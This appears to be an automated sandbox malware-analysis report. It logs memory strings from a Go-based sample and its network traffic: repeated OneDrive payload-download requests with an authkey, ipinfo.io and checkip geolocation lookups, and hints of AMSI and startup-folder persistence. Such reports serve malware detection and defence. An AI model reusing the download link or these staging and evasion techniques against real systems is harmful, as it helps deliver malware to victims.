              Source: veaiqniF.pif, 0000000A.00000001.1622599769.0000000000D90000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Gone&lt;&gt;idle1080DATAPINGopenStatJuneJuly as hourEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT.com.exe.bat.cmdAhomChamKawiLisuMiaoModiNewaThaiToto3125Atoi-Inf+Infboolint8uintchanfunccallkind != allgallprootitabsbrk is LEAFbaseGOGCcas1cas2cas3cas4cas5cas6bitsNameTypeFromxn--cap -> failermssse3avx2bmi1bmi2asn1tag:(\d+)false<nil>Errorntohshostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirLstatMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930CountGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilCall 1562578125int16int32int64uint8arrayslicedefersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...] (at Classtls: Earlyparseutf-8%s*%dtext/bad nmatchrune SHA-1sse41sse42ssse3P-224P-256P-384P-521ECDSAStringFormat[]bytestringhangupkilledlistensocketnetdns.localreturn.onionip+netacceptdomaingophertelnetBasic CookiecookieexpectoriginserverclosedExpectstatusPragmasocks Lockedactivesocks5CANCELGOAWAYPADDEDremoveSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13exec: CommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiGetACPsendto390625uint16uint32uint64structchan<-<-chan Valuesysmontimersefenceselect, not object, val LengthheaderAnswerX25519%w%.0wAcceptServerempty rune1 rdtscppopcntcmd/goSTREETAppDataRoamingWindowsStartupJ2VALIDfloat32float64abortedCopySidWSARecvWSASendconnectsignal windowswsarecvwsasendlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltPATHEXT\\.\UNCAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaFreeSidSleepEx19531259765625invaliduintptrSwapperChanDir Value>ConvertforcegccpuprofunknowngctraceIO waitUNKNOWN:events::ffff:nil keyanswersderivedInitialExpiresSubjectcharsetInstAltInstNopalt -> nop -> any -> %v: %#xSHA-224SHA-256SHA-384SHA-512os/execruntime#internEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amsi.dllkernel324833C0C3ProgramsGoStringno anodeCancelIoReadFileAcceptExWSAIoctlshutdown[::1]:53continue_gatewayinvalid address readfromwsaioctlunixgramLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1no-cacheContinueAcceptedConflicthijackedNO_ERRORPRIORITYSETTINGSFullPathbad instThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02dArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqiEqualSidSetEventIsWindowrecvfrom48828125strconv.parsing ParseIntscavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck
              Source: veaiqniF.pif, 0000000A.00000001.1622599769.0000000000400000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Gone&lt;&gt;idle1080DATAPINGopenStatJuneJuly as hourEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT.com.exe.bat.cmdAhomChamKawiLisuMiaoModiNewaThaiToto3125Atoi-Inf+Infboolint8uintchanfunccallkind != allgallprootitabsbrk is LEAFbaseGOGCcas1cas2cas3cas4cas5cas6bitsNameTypeFromxn--cap -> failermssse3avx2bmi1bmi2asn1tag:(\d+)false<nil>Errorntohshostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirLstatMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930CountGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilCall 1562578125int16int32int64uint8arrayslicedefersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...] (at Classtls: Earlyparseutf-8%s*%dtext/bad nmatchrune SHA-1sse41sse42ssse3P-224P-256P-384P-521ECDSAStringFormat[]bytestringhangupkilledlistensocketnetdns.localreturn.onionip+netacceptdomaingophertelnetBasic CookiecookieexpectoriginserverclosedExpectstatusPragmasocks Lockedactivesocks5CANCELGOAWAYPADDEDremoveSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13exec: CommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiGetACPsendto390625uint16uint32uint64structchan<-<-chan Valuesysmontimersefenceselect, not object, val LengthheaderAnswerX25519%w%.0wAcceptServerempty rune1 rdtscppopcntcmd/goSTREETAppDataRoamingWindowsStartupJ2VALIDfloat32float64abortedCopySidWSARecvWSASendconnectsignal windowswsarecvwsasendlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltPATHEXT\\.\UNCAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaFreeSidSleepEx19531259765625invaliduintptrSwapperChanDir Value>ConvertforcegccpuprofunknowngctraceIO waitUNKNOWN:events::ffff:nil keyanswersderivedInitialExpiresSubjectcharsetInstAltInstNopalt -> nop -> any -> %v: %#xSHA-224SHA-256SHA-384SHA-512os/execruntime#internEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amsi.dllkernel324833C0C3ProgramsGoStringno anodeCancelIoReadFileAcceptExWSAIoctlshutdown[::1]:53continue_gatewayinvalid address readfromwsaioctlunixgramLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1no-cacheContinueAcceptedConflicthijackedNO_ERRORPRIORITYSETTINGSFullPathbad instThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02dArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqiEqualSidSetEventIsWindowrecvfrom48828125strconv.parsing ParseIntscavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck
              Source: veaiqniF.pif, 0000000A.00000002.1900086210.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Gone&lt;&gt;idle1080DATAPINGopenStatJuneJuly as hourEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT.com.exe.bat.cmdAhomChamKawiLisuMiaoModiNewaThaiToto3125Atoi-Inf+Infboolint8uintchanfunccallkind != allgallprootitabsbrk is LEAFbaseGOGCcas1cas2cas3cas4cas5cas6bitsNameTypeFromxn--cap -> failermssse3avx2bmi1bmi2asn1tag:(\d+)false<nil>Errorntohshostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirLstatMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930CountGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilCall 1562578125int16int32int64uint8arrayslicedefersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...] (at Classtls: Earlyparseutf-8%s*%dtext/bad nmatchrune SHA-1sse41sse42ssse3P-224P-256P-384P-521ECDSAStringFormat[]bytestringhangupkilledlistensocketnetdns.localreturn.onionip+netacceptdomaingophertelnetBasic CookiecookieexpectoriginserverclosedExpectstatusPragmasocks Lockedactivesocks5CANCELGOAWAYPADDEDremoveSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13exec: CommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiGetACPsendto390625uint16uint32uint64structchan<-<-chan Valuesysmontimersefenceselect, not object, val LengthheaderAnswerX25519%w%.0wAcceptServerempty rune1 rdtscppopcntcmd/goSTREETAppDataRoamingWindowsStartupJ2VALIDfloat32float64abortedCopySidWSARecvWSASendconnectsignal windowswsarecvwsasendlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltPATHEXT\\.\UNCAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaFreeSidSleepEx19531259765625invaliduintptrSwapperChanDir Value>ConvertforcegccpuprofunknowngctraceIO waitUNKNOWN:events::ffff:nil keyanswersderivedInitialExpiresSubjectcharsetInstAltInstNopalt -> nop -> any -> %v: %#xSHA-224SHA-256SHA-384SHA-512os/execruntime#internEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amsi.dllkernel324833C0C3ProgramsGoStringno anodeCancelIoReadFileAcceptExWSAIoctlshutdown[::1]:53continue_gatewayinvalid address readfromwsaioctlunixgramLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1no-cacheContinueAcceptedConflicthijackedNO_ERRORPRIORITYSETTINGSFullPathbad instThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02dArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqiEqualSidSetEventIsWindowrecvfrom48828125strconv.parsing ParseIntscavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck
              Source: veaiqniF.pif, 0000000C.00000002.1945846450.0000000000D90000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Gone&lt;&gt;idle1080DATAPINGopenStatJuneJuly as hourEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT.com.exe.bat.cmdAhomChamKawiLisuMiaoModiNewaThaiToto3125Atoi-Inf+Infboolint8uintchanfunccallkind != allgallprootitabsbrk is LEAFbaseGOGCcas1cas2cas3cas4cas5cas6bitsNameTypeFromxn--cap -> failermssse3avx2bmi1bmi2asn1tag:(\d+)false<nil>Errorntohshostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirLstatMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930CountGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilCall 1562578125int16int32int64uint8arrayslicedefersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...] (at Classtls: Earlyparseutf-8%s*%dtext/bad nmatchrune SHA-1sse41sse42ssse3P-224P-256P-384P-521ECDSAStringFormat[]bytestringhangupkilledlistensocketnetdns.localreturn.onionip+netacceptdomaingophertelnetBasic CookiecookieexpectoriginserverclosedExpectstatusPragmasocks Lockedactivesocks5CANCELGOAWAYPADDEDremoveSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13exec: CommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiGetACPsendto390625uint16uint32uint64structchan<-<-chan Valuesysmontimersefenceselect, not object, val LengthheaderAnswerX25519%w%.0wAcceptServerempty rune1 rdtscppopcntcmd/goSTREETAppDataRoamingWindowsStartupJ2VALIDfloat32float64abortedCopySidWSARecvWSASendconnectsignal windowswsarecvwsasendlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltPATHEXT\\.\UNCAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaFreeSidSleepEx19531259765625invaliduintptrSwapperChanDir Value>ConvertforcegccpuprofunknowngctraceIO waitUNKNOWN:events::ffff:nil keyanswersderivedInitialExpiresSubjectcharsetInstAltInstNopalt -> nop -> any -> %v: %#xSHA-224SHA-256SHA-384SHA-512os/execruntime#internEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amsi.dllkernel324833C0C3ProgramsGoStringno anodeCancelIoReadFileAcceptExWSAIoctlshutdown[::1]:53continue_gatewayinvalid address readfromwsaioctlunixgramLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1no-cacheContinueAcceptedConflicthijackedNO_ERRORPRIORITYSETTINGSFullPathbad instThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02dArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqiEqualSidSetEventIsWindowrecvfrom48828125strconv.parsing ParseIntscavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0423BB38 InternetCheckConnectionA,0_2_0423BB38
              Source: Joe Sandbox ViewIP Address: 34.117.186.192 34.117.186.192
              Source: Joe Sandbox ViewIP Address: 34.117.186.192 34.117.186.192
              Source: Joe Sandbox ViewIP Address: 13.107.137.11 13.107.137.11
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: unknownDNS query: name: ipinfo.io
              Source: unknownDNS query: name: ipinfo.io
              Source: unknownDNS query: name: checkip.amazonaws.com
              Source: unknownDNS query: name: checkip.amazonaws.com
              Source: global trafficHTTP traffic detected: GET /download?resid=22C765749E54F934%21123&authkey=!AMeDDn457FXvGpE HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET /download?resid=22C765749E54F934%21123&authkey=!AMeDDn457FXvGpE HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET /download?resid=22C765749E54F934%21123&authkey=!AMeDDn457FXvGpE HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /download?resid=22C765749E54F934%21123&authkey=!AMeDDn457FXvGpE HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.ioUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: checkip.amazonaws.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /download?resid=22C765749E54F934%21123&authkey=!AMeDDn457FXvGpE HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET /download?resid=22C765749E54F934%21123&authkey=!AMeDDn457FXvGpE HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.ioUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: checkip.amazonaws.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.ioUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: checkip.amazonaws.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
              Source: unknownDNS traffic detected: queries for: onedrive.live.com
              Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1484946816.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1483689151.000000001BC21000.00000004.00000020.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1677400225.000000007FA0F000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1634357707.00000000041D6000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 0000000B.00000002.1747949897.0000000004146000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
              Source: veaiqniF.pif, 00000007.00000003.1529994916.000000002F746000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: qDKTsL1y44.exe, 00000000.00000002.1503258792.0000000000907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftq#
              Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
              Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
              Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1484946816.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1483689151.000000001BC21000.00000004.00000020.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1677400225.000000007FA0F000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1634357707.00000000041D6000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 0000000B.00000002.1747949897.0000000004146000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0$
